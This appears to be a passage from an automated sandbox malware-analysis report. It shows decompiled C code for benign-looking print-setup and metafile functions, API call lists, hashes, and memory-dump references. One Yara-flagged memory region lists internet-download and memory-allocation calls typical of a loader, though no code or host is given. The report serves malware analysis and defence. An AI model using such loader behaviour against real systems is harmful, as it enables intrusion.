                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d81ed8a8deec5d80809c924b94113919c9e26edd99e23e1aec15569c4d028cfe
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10517075900218DBDB19CF54DCC4BAA77B8FF48710F108299EE049B685E7B5EC85CB90
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 83%
                                                                                                                                                                                                                                                                                          			E000F9530(intOrPtr __ecx, void* __eflags) {
                                                                                                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                                          				struct tagRECT _v76;
                                                                                                                                                                                                                                                                                          				void* _v108;
                                                                                                                                                                                                                                                                                          				void* _v112;
                                                                                                                                                                                                                                                                                          				struct HWND__* _v116;
                                                                                                                                                                                                                                                                                          				struct tagPSD _v120;
                                                                                                                                                                                                                                                                                          				intOrPtr _v136;
                                                                                                                                                                                                                                                                                          				struct tagRECT* _v140;
                                                                                                                                                                                                                                                                                          				long _v144;
                                                                                                                                                                                                                                                                                          				char _v148;
                                                                                                                                                                                                                                                                                          				void* _v152;
                                                                                                                                                                                                                                                                                          				char _v156;
                                                                                                                                                                                                                                                                                          				intOrPtr _v160;
                                                                                                                                                                                                                                                                                          				void* _v164;
                                                                                                                                                                                                                                                                                          				struct tagRECT* _v168;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t53;
                                                                                                                                                                                                                                                                                          				signed int _t54;
                                                                                                                                                                                                                                                                                          				void* _t58;
                                                                                                                                                                                                                                                                                          				struct tagRECT* _t60;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t62;
                                                                                                                                                                                                                                                                                          				signed int _t65;
                                                                                                                                                                                                                                                                                          				void* _t77;
                                                                                                                                                                                                                                                                                          				void* _t78;
                                                                                                                                                                                                                                                                                          				intOrPtr _t93;
                                                                                                                                                                                                                                                                                          				void* _t94;
                                                                                                                                                                                                                                                                                          				void* _t96;
                                                                                                                                                                                                                                                                                          				void** _t115;
                                                                                                                                                                                                                                                                                          				void* _t116;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t120;
                                                                                                                                                                                                                                                                                          				void* _t122;
                                                                                                                                                                                                                                                                                          				signed int _t123;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_push(0xffffffff);
                                                                                                                                                                                                                                                                                          				_push(E0010FB38);
                                                                                                                                                                                                                                                                                          				_push( *[fs:0x0]);
                                                                                                                                                                                                                                                                                          				_t53 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_t54 = _t53 ^ _t123;
                                                                                                                                                                                                                                                                                          				_v20 = _t54;
                                                                                                                                                                                                                                                                                          				_push(_t54);
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] =  &_v16;
                                                                                                                                                                                                                                                                                          				_t93 = __ecx;
                                                                                                                                                                                                                                                                                          				_v160 = __ecx;
                                                                                                                                                                                                                                                                                          				E000FB010( &_v156);
                                                                                                                                                                                                                                                                                          				_v156 = 0x112d90;
                                                                                                                                                                                                                                                                                          				_t58 = 0;
                                                                                                                                                                                                                                                                                          				_t120 = _t93 + 0x4bc;
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				if( *_t120 != 0 &&  *((intOrPtr*)(_t120 + 4)) != 0) {
                                                                                                                                                                                                                                                                                          					_t87 =  *((intOrPtr*)(_t120 + 4));
                                                                                                                                                                                                                                                                                          					_t118 = ( *( *((intOrPtr*)(_t120 + 4)) + 0x26) & 0x0000ffff) + ( *(_t87 + 0x24) & 0x0000ffff);
                                                                                                                                                                                                                                                                                          					_t96 = GlobalAlloc(2, ( *( *((intOrPtr*)(_t120 + 4)) + 0x26) & 0x0000ffff) + ( *(_t87 + 0x24) & 0x0000ffff));
                                                                                                                                                                                                                                                                                          					_t130 = _t96;
                                                                                                                                                                                                                                                                                          					if(_t96 != 0) {
                                                                                                                                                                                                                                                                                          						E001096A0(GlobalLock(_t96),  *((intOrPtr*)(_t120 + 4)), _t118);
                                                                                                                                                                                                                                                                                          						GlobalUnlock(_t96);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t58 = _t96;
                                                                                                                                                                                                                                                                                          					_t93 = _v160;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t115 = _t93 + 0x4b8;
                                                                                                                                                                                                                                                                                          				_v112 = _t58;
                                                                                                                                                                                                                                                                                          				_v108 = E000FC710(_t115, _t130);
                                                                                                                                                                                                                                                                                          				_t60 = _t93 + 0x514;
                                                                                                                                                                                                                                                                                          				_v76.left =  *(_t93 + 0x514);
                                                                                                                                                                                                                                                                                          				_v168 = _t60;
                                                                                                                                                                                                                                                                                          				_v76.top =  *((intOrPtr*)(_t93 + 0x518));
                                                                                                                                                                                                                                                                                          				_v76.right = _t60->right;
                                                                                                                                                                                                                                                                                          				_v76.bottom = _t60->bottom;
                                                                                                                                                                                                                                                                                          				_t62 = GetActiveWindow();
                                                                                                                                                                                                                                                                                          				if(_v116 == 0) {
                                                                                                                                                                                                                                                                                          					_v116 = _t62;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_v148 =  &_v156;
                                                                                                                                                                                                                                                                                          				_v144 = GetCurrentThreadId();
                                                                                                                                                                                                                                                                                          				EnterCriticalSection(0x170c68);
                                                                                                                                                                                                                                                                                          				_t112 =  *0x170c80; // 0x0
                                                                                                                                                                                                                                                                                          				_v140 = _t112;
                                                                                                                                                                                                                                                                                          				 *0x170c80 =  &_v148;
                                                                                                                                                                                                                                                                                          				LeaveCriticalSection(0x170c68);
                                                                                                                                                                                                                                                                                          				_t65 = PageSetupDlgA( &_v120);
                                                                                                                                                                                                                                                                                          				asm("sbb eax, eax");
                                                                                                                                                                                                                                                                                          				_v152 = 0;
                                                                                                                                                                                                                                                                                          				if( ~_t65 + 2 == 1) {
                                                                                                                                                                                                                                                                                          					_t77 = _v112;
                                                                                                                                                                                                                                                                                          					_v164 = _t77;
                                                                                                                                                                                                                                                                                          					if(_t77 != 0) {
                                                                                                                                                                                                                                                                                          						E000FFE10(GlobalLock(_t77), _t120);
                                                                                                                                                                                                                                                                                          						GlobalUnlock(_v164);
                                                                                                                                                                                                                                                                                          						_t93 = _v160;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t78 =  *_t115;
                                                                                                                                                                                                                                                                                          					if(_t78 != 0) {
                                                                                                                                                                                                                                                                                          						ClosePrinter(_t78);
                                                                                                                                                                                                                                                                                          						 *_t115 = 0;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					E000FC5D0( *((intOrPtr*)(_t93 + 0x4c0)), _t115, _v108);
                                                                                                                                                                                                                                                                                          					_t112 = _v168;
                                                                                                                                                                                                                                                                                          					CopyRect(_v168,  &_v76);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				GlobalFree(_v112);
                                                                                                                                                                                                                                                                                          				GlobalFree(_v108);
                                                                                                                                                                                                                                                                                          				_v8 = 1;
                                                                                                                                                                                                                                                                                          				_t71 = _v24;
                                                                                                                                                                                                                                                                                          				if(_v24 != 0) {
                                                                                                                                                                                                                                                                                          					E00105701(_t71);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_v8 = 0xffffffff;
                                                                                                                                                                                                                                                                                          				_t72 = _v136;
                                                                                                                                                                                                                                                                                          				if(_v136 != 0) {
                                                                                                                                                                                                                                                                                          					E00105701(_t72);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] = _v16;
                                                                                                                                                                                                                                                                                          				_pop(_t116);
                                                                                                                                                                                                                                                                                          				_pop(_t122);
                                                                                                                                                                                                                                                                                          				_pop(_t94);
                                                                                                                                                                                                                                                                                          				return E001059E6(0, _t94, _v20 ^ _t123, _t112, _t116, _t122);
                                                                                                                                                                                                                                                                                          			}








































                                                                                                                                                                                                                                                                                          0x000f9533
                                                                                                                                                                                                                                                                                          0x000f9535
                                                                                                                                                                                                                                                                                          0x000f9540
                                                                                                                                                                                                                                                                                          0x000f9547
                                                                                                                                                                                                                                                                                          0x000f954c
                                                                                                                                                                                                                                                                                          0x000f954e
                                                                                                                                                                                                                                                                                          0x000f9554
                                                                                                                                                                                                                                                                                          0x000f9558
                                                                                                                                                                                                                                                                                          0x000f9564
                                                                                                                                                                                                                                                                                          0x000f9567
                                                                                                                                                                                                                                                                                          0x000f956d
                                                                                                                                                                                                                                                                                          0x000f9572
                                                                                                                                                                                                                                                                                          0x000f957c
                                                                                                                                                                                                                                                                                          0x000f957e
                                                                                                                                                                                                                                                                                          0x000f9584
                                                                                                                                                                                                                                                                                          0x000f9589
                                                                                                                                                                                                                                                                                          0x000f9590
                                                                                                                                                                                                                                                                                          0x000f959b
                                                                                                                                                                                                                                                                                          0x000f95a6
                                                                                                                                                                                                                                                                                          0x000f95a8
                                                                                                                                                                                                                                                                                          0x000f95aa
                                                                                                                                                                                                                                                                                          0x000f95b9
                                                                                                                                                                                                                                                                                          0x000f95c2
                                                                                                                                                                                                                                                                                          0x000f95c2
                                                                                                                                                                                                                                                                                          0x000f95c8
                                                                                                                                                                                                                                                                                          0x000f95ca
                                                                                                                                                                                                                                                                                          0x000f95ca
                                                                                                                                                                                                                                                                                          0x000f95d0
                                                                                                                                                                                                                                                                                          0x000f95d8
                                                                                                                                                                                                                                                                                          0x000f95ec
                                                                                                                                                                                                                                                                                          0x000f95ef
                                                                                                                                                                                                                                                                                          0x000f95f5
                                                                                                                                                                                                                                                                                          0x000f95fb
                                                                                                                                                                                                                                                                                          0x000f9604
                                                                                                                                                                                                                                                                                          0x000f9607
                                                                                                                                                                                                                                                                                          0x000f960a
                                                                                                                                                                                                                                                                                          0x000f960d
                                                                                                                                                                                                                                                                                          0x000f9617
                                                                                                                                                                                                                                                                                          0x000f9619
                                                                                                                                                                                                                                                                                          0x000f9619
                                                                                                                                                                                                                                                                                          0x000f9622
                                                                                                                                                                                                                                                                                          0x000f9633
                                                                                                                                                                                                                                                                                          0x000f9639
                                                                                                                                                                                                                                                                                          0x000f963f
                                                                                                                                                                                                                                                                                          0x000f9650
                                                                                                                                                                                                                                                                                          0x000f9656
                                                                                                                                                                                                                                                                                          0x000f965b
                                                                                                                                                                                                                                                                                          0x000f9665
                                                                                                                                                                                                                                                                                          0x000f966d
                                                                                                                                                                                                                                                                                          0x000f9672
                                                                                                                                                                                                                                                                                          0x000f967f
                                                                                                                                                                                                                                                                                          0x000f9681
                                                                                                                                                                                                                                                                                          0x000f9684
                                                                                                                                                                                                                                                                                          0x000f968c
                                                                                                                                                                                                                                                                                          0x000f9698
                                                                                                                                                                                                                                                                                          0x000f96a4
                                                                                                                                                                                                                                                                                          0x000f96aa
                                                                                                                                                                                                                                                                                          0x000f96aa
                                                                                                                                                                                                                                                                                          0x000f96b0
                                                                                                                                                                                                                                                                                          0x000f96b4
                                                                                                                                                                                                                                                                                          0x000f96b7
                                                                                                                                                                                                                                                                                          0x000f96bd
                                                                                                                                                                                                                                                                                          0x000f96bd
                                                                                                                                                                                                                                                                                          0x000f96cd
                                                                                                                                                                                                                                                                                          0x000f96d2
                                                                                                                                                                                                                                                                                          0x000f96dd
                                                                                                                                                                                                                                                                                          0x000f96dd
                                                                                                                                                                                                                                                                                          0x000f96ed
                                                                                                                                                                                                                                                                                          0x000f96f3
                                                                                                                                                                                                                                                                                          0x000f96f5
                                                                                                                                                                                                                                                                                          0x000f96fc
                                                                                                                                                                                                                                                                                          0x000f9701
                                                                                                                                                                                                                                                                                          0x000f9704
                                                                                                                                                                                                                                                                                          0x000f9704
                                                                                                                                                                                                                                                                                          0x000f9709
                                                                                                                                                                                                                                                                                          0x000f9710
                                                                                                                                                                                                                                                                                          0x000f9718
                                                                                                                                                                                                                                                                                          0x000f971b
                                                                                                                                                                                                                                                                                          0x000f971b
                                                                                                                                                                                                                                                                                          0x000f9725
                                                                                                                                                                                                                                                                                          0x000f972d
                                                                                                                                                                                                                                                                                          0x000f972e
                                                                                                                                                                                                                                                                                          0x000f972f
                                                                                                                                                                                                                                                                                          0x000f973d

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 000FB010: _memset.LIBCMT ref: 000FB062
                                                                                                                                                                                                                                                                                            • Part of subcall function 000FB010: GetCurrentProcess.KERNEL32(?,0000000D), ref: 000FB0BB
                                                                                                                                                                                                                                                                                            • Part of subcall function 000FB010: FlushInstructionCache.KERNEL32(00000000), ref: 000FB0C2
                                                                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000002,?,?,1F9A9BDF,?,?,?), ref: 000F95A0
                                                                                                                                                                                                                                                                                          • GlobalLock.KERNEL32 ref: 000F95AD
                                                                                                                                                                                                                                                                                          • _memmove.LIBCMT ref: 000F95B9
                                                                                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000,?,?,?), ref: 000F95C2
                                                                                                                                                                                                                                                                                          • GetActiveWindow.USER32 ref: 000F960D
                                                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 000F9628
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00170C68,?,?,?), ref: 000F9639
                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00170C68,?,?,?), ref: 000F965B
                                                                                                                                                                                                                                                                                          • PageSetupDlgA.COMDLG32(?,?,?,?), ref: 000F9665
                                                                                                                                                                                                                                                                                          • GlobalLock.KERNEL32 ref: 000F968F
                                                                                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(?,?,?,?,?), ref: 000F96A4
                                                                                                                                                                                                                                                                                          • ClosePrinter.WINSPOOL.DRV(?,?,?,?), ref: 000F96B7
                                                                                                                                                                                                                                                                                          • CopyRect.USER32 ref: 000F96DD
                                                                                                                                                                                                                                                                                          • GlobalFree.KERNEL32 ref: 000F96ED
                                                                                                                                                                                                                                                                                          • GlobalFree.KERNEL32 ref: 000F96F3
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Global$CriticalCurrentFreeLockSectionUnlock$ActiveAllocCacheCloseCopyEnterFlushInstructionLeavePagePrinter.ProcessRectSetupThreadWindow_memmove_memset
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3499382343-0
                                                                                                                                                                                                                                                                                          • Opcode ID: adb4d583b2f1a272ad3910ebeb23eeaa4d47d8b515b5aa76c39746f1265835e0
                                                                                                                                                                                                                                                                                          • Instruction ID: 065e72173e687df1cc8eaca1e70b2a5a42a0c9a82b91ce741ecb2f7860bb56de
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: adb4d583b2f1a272ad3910ebeb23eeaa4d47d8b515b5aa76c39746f1265835e0
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 73512874E00319DFCB65DFA4DD89BAAB7B8FB08300F104569E909D7641DB74A980CF60
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • InternetQueryOptionA.WININET(04013B80,0000001F,?,00000004), ref: 02524339
                                                                                                                                                                                                                                                                                          • InternetSetOptionA.WININET(04013B80,0000001F,?,00000004), ref: 0252435A
                                                                                                                                                                                                                                                                                          • InternetOpenUrlA.WININET(04013B80,00000000,?,00000042,80000200,00000000), ref: 02524377
                                                                                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 025243CF
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0252440F
                                                                                                                                                                                                                                                                                          • InternetReadFile.WININET(00000000,?,00000000,00000000), ref: 0252445E
                                                                                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(00000000,0000001D,?,00000100,00000000), ref: 025244FC
                                                                                                                                                                                                                                                                                          • lstrcmpi.KERNEL32(?,0400C43C), ref: 02524512
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0252458F
                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 02524599
                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 025245A1
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          • Accept: */*Accept-Language: enAccept-Encoding: gzip, deflate, xrefs: 025242F9
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719355201.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2520000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Internet$Query$HttpInfoOptionVirtual$AllocCloseErrorFileFreeHandleLastOpenReadlstrcmpi
                                                                                                                                                                                                                                                                                          • String ID: Accept: */*Accept-Language: enAccept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                          • API String ID: 2564233093-1307439301
                                                                                                                                                                                                                                                                                          • Opcode ID: a41bf3c3cabbdcd58d5f4c5568134322b601fe695568ced017fe9f7a371d6d63
                                                                                                                                                                                                                                                                                          • Instruction ID: 6475b59f83e8dde8cb83632982fb8d4ffe0af84a0c203313986722909d0c8308
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a41bf3c3cabbdcd58d5f4c5568134322b601fe695568ced017fe9f7a371d6d63
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C911F71A04228DBEB25CF94CC94BEE77B9FB49300F108599E609A72C4DB759E88CF54
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                                                                                                                                                                          			E000F66C0(struct HENHMETAFILE__* __ecx, intOrPtr* __esi) {
                                                                                                                                                                                                                                                                                          				CHAR* _v8;
                                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                                                                                                          				struct tagRECT _v36;
                                                                                                                                                                                                                                                                                          				struct HENHMETAFILE__* _v40;
                                                                                                                                                                                                                                                                                          				int _v44;
                                                                                                                                                                                                                                                                                          				int _v48;
                                                                                                                                                                                                                                                                                          				int _v52;
                                                                                                                                                                                                                                                                                          				int _v56;
                                                                                                                                                                                                                                                                                          				struct HDC__* _v60;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				signed int _t47;
                                                                                                                                                                                                                                                                                          				signed int _t48;
                                                                                                                                                                                                                                                                                          				intOrPtr _t50;
                                                                                                                                                                                                                                                                                          				intOrPtr _t54;
                                                                                                                                                                                                                                                                                          				struct HENHMETAFILE__* _t75;
                                                                                                                                                                                                                                                                                          				void* _t80;
                                                                                                                                                                                                                                                                                          				struct HDC__* _t82;
                                                                                                                                                                                                                                                                                          				intOrPtr _t103;
                                                                                                                                                                                                                                                                                          				void* _t106;
                                                                                                                                                                                                                                                                                          				struct HDC__* _t107;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t108;
                                                                                                                                                                                                                                                                                          				signed int _t109;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t108 = __esi;
                                                                                                                                                                                                                                                                                          				_push(0xffffffff);
                                                                                                                                                                                                                                                                                          				_push(E0010F1B0);
                                                                                                                                                                                                                                                                                          				_push( *[fs:0x0]);
                                                                                                                                                                                                                                                                                          				_t47 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_t48 = _t47 ^ _t109;
                                                                                                                                                                                                                                                                                          				_v20 = _t48;
                                                                                                                                                                                                                                                                                          				_push(_t48);
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] =  &_v16;
                                                                                                                                                                                                                                                                                          				_t50 =  *((intOrPtr*)( *__esi));
                                                                                                                                                                                                                                                                                          				_t96 =  *((intOrPtr*)(_t50 + 0x18));
                                                                                                                                                                                                                                                                                          				_push(__ecx);
                                                                                                                                                                                                                                                                                          				_v40 = __ecx;
                                                                                                                                                                                                                                                                                          				if( *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x18))))() == 0) {
                                                                                                                                                                                                                                                                                          					L13:
                                                                                                                                                                                                                                                                                          					 *[fs:0x0] = _v16;
                                                                                                                                                                                                                                                                                          					_pop(_t106);
                                                                                                                                                                                                                                                                                          					_pop(_t80);
                                                                                                                                                                                                                                                                                          					return E001059E6(_t51, _t80, _v20 ^ _t109, _t96, _t106, _t108);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(__esi + 0x1c)) = __ecx;
                                                                                                                                                                                                                                                                                          				_push(__ecx);
                                                                                                                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                                                                                                                          				_t54 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *__esi)) + 0x14))))();
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(__esi + 0x10)) = _t54;
                                                                                                                                                                                                                                                                                          				_t113 = _t54;
                                                                                                                                                                                                                                                                                          				if(_t54 == 0) {
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(__esi + 0x10)) =  *((intOrPtr*)(__esi + 0xc));
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t107 = E000FC830(_t113, _t108 + 4,  *((intOrPtr*)(_t108 + 0x10)));
                                                                                                                                                                                                                                                                                          				_v60 = _t107;
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				_v56 = GetDeviceCaps(_t107, 0x6e);
                                                                                                                                                                                                                                                                                          				_v44 = GetDeviceCaps(_t107, 0x6f);
                                                                                                                                                                                                                                                                                          				_v52 = GetDeviceCaps(_t107, 0x58);
                                                                                                                                                                                                                                                                                          				_v48 = GetDeviceCaps(_t107, 0x5a);
                                                                                                                                                                                                                                                                                          				_v36.left = 0;
                                                                                                                                                                                                                                                                                          				_v36.top = 0;
                                                                                                                                                                                                                                                                                          				_v36.right = MulDiv(_v56, 0x9ec, _v52);
                                                                                                                                                                                                                                                                                          				_v36.bottom = MulDiv(_v44, 0x9ec, _v48);
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t108 + 0x14)) = GetDeviceCaps(_t107, 0x70);
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t108 + 0x18)) = GetDeviceCaps(_t107, 0x71);
                                                                                                                                                                                                                                                                                          				_t82 = CreateEnhMetaFileA(_t107, 0,  &_v36, 0);
                                                                                                                                                                                                                                                                                          				_v44 = _t82;
                                                                                                                                                                                                                                                                                          				_v8 = 1;
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t108)) + 8))))(_v40, _t82);
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t108)) + 0xc))))(_v40, _t82);
                                                                                                                                                                                                                                                                                          				_t103 =  *((intOrPtr*)( *_t108));
                                                                                                                                                                                                                                                                                          				_t96 =  *((intOrPtr*)(_t103 + 0x10));
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x10))))(_v40, _t82);
                                                                                                                                                                                                                                                                                          				_v40 = 0;
                                                                                                                                                                                                                                                                                          				if(_t82 != 0) {
                                                                                                                                                                                                                                                                                          					_v40 = CloseEnhMetaFile(_t82);
                                                                                                                                                                                                                                                                                          					_t82 = 0;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t75 =  *(_t108 + 8);
                                                                                                                                                                                                                                                                                          				if(_t75 != 0 && _t75 != _v40) {
                                                                                                                                                                                                                                                                                          					DeleteEnhMetaFile(_t75);
                                                                                                                                                                                                                                                                                          					 *(_t108 + 8) = 0;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t51 = _v40;
                                                                                                                                                                                                                                                                                          				 *(_t108 + 8) = _v40;
                                                                                                                                                                                                                                                                                          				if(_t82 != 0) {
                                                                                                                                                                                                                                                                                          					_t51 = CloseEnhMetaFile(_t82);
                                                                                                                                                                                                                                                                                          					if(_t51 != 0) {
                                                                                                                                                                                                                                                                                          						_t51 = DeleteEnhMetaFile(_t51);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				if(_t107 != 0) {
                                                                                                                                                                                                                                                                                          					_t51 = DeleteDC(_t107);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				goto L13;
                                                                                                                                                                                                                                                                                          			}



























                                                                                                                                                                                                                                                                                          0x000f66c0
                                                                                                                                                                                                                                                                                          0x000f66c3
                                                                                                                                                                                                                                                                                          0x000f66c5
                                                                                                                                                                                                                                                                                          0x000f66d0
                                                                                                                                                                                                                                                                                          0x000f66d4
                                                                                                                                                                                                                                                                                          0x000f66d9
                                                                                                                                                                                                                                                                                          0x000f66db
                                                                                                                                                                                                                                                                                          0x000f66e0
                                                                                                                                                                                                                                                                                          0x000f66e4
                                                                                                                                                                                                                                                                                          0x000f66ee
                                                                                                                                                                                                                                                                                          0x000f66f0
                                                                                                                                                                                                                                                                                          0x000f66f3
                                                                                                                                                                                                                                                                                          0x000f66f4
                                                                                                                                                                                                                                                                                          0x000f66fb
                                                                                                                                                                                                                                                                                          0x000f683a
                                                                                                                                                                                                                                                                                          0x000f683d
                                                                                                                                                                                                                                                                                          0x000f6845
                                                                                                                                                                                                                                                                                          0x000f6846
                                                                                                                                                                                                                                                                                          0x000f6854
                                                                                                                                                                                                                                                                                          0x000f6854
                                                                                                                                                                                                                                                                                          0x000f6703
                                                                                                                                                                                                                                                                                          0x000f670b
                                                                                                                                                                                                                                                                                          0x000f670c
                                                                                                                                                                                                                                                                                          0x000f670e
                                                                                                                                                                                                                                                                                          0x000f6710
                                                                                                                                                                                                                                                                                          0x000f6713
                                                                                                                                                                                                                                                                                          0x000f6715
                                                                                                                                                                                                                                                                                          0x000f671a
                                                                                                                                                                                                                                                                                          0x000f671a
                                                                                                                                                                                                                                                                                          0x000f672a
                                                                                                                                                                                                                                                                                          0x000f672c
                                                                                                                                                                                                                                                                                          0x000f6731
                                                                                                                                                                                                                                                                                          0x000f6744
                                                                                                                                                                                                                                                                                          0x000f674c
                                                                                                                                                                                                                                                                                          0x000f6754
                                                                                                                                                                                                                                                                                          0x000f675c
                                                                                                                                                                                                                                                                                          0x000f6761
                                                                                                                                                                                                                                                                                          0x000f6764
                                                                                                                                                                                                                                                                                          0x000f677b
                                                                                                                                                                                                                                                                                          0x000f6790
                                                                                                                                                                                                                                                                                          0x000f6798
                                                                                                                                                                                                                                                                                          0x000f67a6
                                                                                                                                                                                                                                                                                          0x000f67af
                                                                                                                                                                                                                                                                                          0x000f67b1
                                                                                                                                                                                                                                                                                          0x000f67b7
                                                                                                                                                                                                                                                                                          0x000f67c4
                                                                                                                                                                                                                                                                                          0x000f67d2
                                                                                                                                                                                                                                                                                          0x000f67d6
                                                                                                                                                                                                                                                                                          0x000f67db
                                                                                                                                                                                                                                                                                          0x000f67e0
                                                                                                                                                                                                                                                                                          0x000f67e2
                                                                                                                                                                                                                                                                                          0x000f67eb
                                                                                                                                                                                                                                                                                          0x000f67f4
                                                                                                                                                                                                                                                                                          0x000f67f7
                                                                                                                                                                                                                                                                                          0x000f67f7
                                                                                                                                                                                                                                                                                          0x000f67f9
